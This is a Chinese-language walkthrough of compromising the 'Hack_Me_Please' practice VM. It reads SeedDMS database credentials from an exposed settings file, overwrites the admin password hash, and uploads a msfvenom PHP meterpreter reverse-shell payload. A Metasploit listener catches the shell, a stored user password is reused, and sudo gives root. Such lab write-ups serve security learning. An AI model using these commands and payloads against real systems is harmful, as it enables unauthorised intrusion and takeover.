Hack_Me_Please靶机渗透过程

准备环境

攻击机：WSL-Kali-Linux
目标靶机：Hack_Me_Please
平台：VMware Workstation 16.2
靶机为NAT模式

一、信息搜集

1.主机嗅探

VMware这边直接显示靶机的IP了，这边就懒得去进行主机嗅探了

2.端口扫描

对靶机进行端口扫描

nmap -A -p- 192.168.9.128

由扫描结果可知。该靶机已开放如下端口

可见，22端口处于关闭状态

3.访问其web页面

经过一番操作并没有发现网页上有任何可用信息

通过目录扫描也没发现特别之处

查看其源码,从js下手，终于在第384行发现main.js文件，也就是该靶机入手的关键

点击访问该js文件，就在下边不远处，发现一个关键点

发现是一个seeddms的文件管理系统，且其版本号为5.1.22

二、漏洞挖掘

1.寻找程序漏洞

通过Google该管理系统，能够看到其程序源码

源码目录下有个名为conf的文件夹，里面有个名为settings.xml的配置文件

尝试访问靶机的settings.xml文件

http://192.168.9.128/seeddms51x/conf/settings.xml

发现网站程序绝对路径

发现网站数据库用户名和密码

用户名为seeddms，密码为seeddms

2.对seeddms主程序进行目录扫描

dirsearch -u http://192.168.9.128/seeddms51x/seeddms-5.1.22/

发现登录页面

三、漏洞利用

1.连接目标数据库

mysql -h 192.168.9.128 -useeddms -p

查看所有数据库

show databases;

存在seeddms数据库，列出其包含的所有表

show tables;

发现几个可疑表：tblDocumentContent，tblUsers，users

先查看tblUsers里面的内容

select * from tblUsers;

有用户admin和被md5加密的密码，可以对admin的密码强制更改为md5加密后的123456，以达到完成对admin密码的更改的目的,123456进行md5加密之后为e10adc3949ba59abbe56e057f20f883e

update seeddms.tblUsers set pwd = 'e10adc3949ba59abbe56e057f20f883e' where id =1;

2.后台登陆

可以去后台使用admin和123456完成登录

可以看到有上传入口，该版本含有文件上传漏洞

使用msf生成木马上传

msfvenom -p php/meterpreter_reverse_tcp lhost=172.20.236.69 lport=9999 -e -f raw > 1.php

对该木马进行上传

查看该木马文件的物理路径

select * from tblDocumentContent;

在4/目录下，访问该木马文件

3.反弹shell

同时启动监听

# 使用监听模块
use exploit/multi/handler
# 设置本地监听服务器
set lhost 172.20.224.58
# 设置本地监听端口
set lport 9999
# 设置监听有效载荷
set patload php/meterpreter_reverse_tcp
# 查看配置信息
show options
# 运行
run

进入shell并设置回显

shell
python3 -c 'import pty;pty.spawn("/bin/bash")'

查看home目录下有哪些用户

ls -lha /home

发现只有saket用户，回想起刚才数据库中的users表，查看users表里面的内容

猜测这就是用户saket的密码，进行测试

su saket
Saket@#$1337

成功登录saket用户，查看其权限

sudo -l

用户能以root身份执行所有命令，可以直接免密切换为root账户

sudo su

成功拿到root用户

目标靶机已完成渗透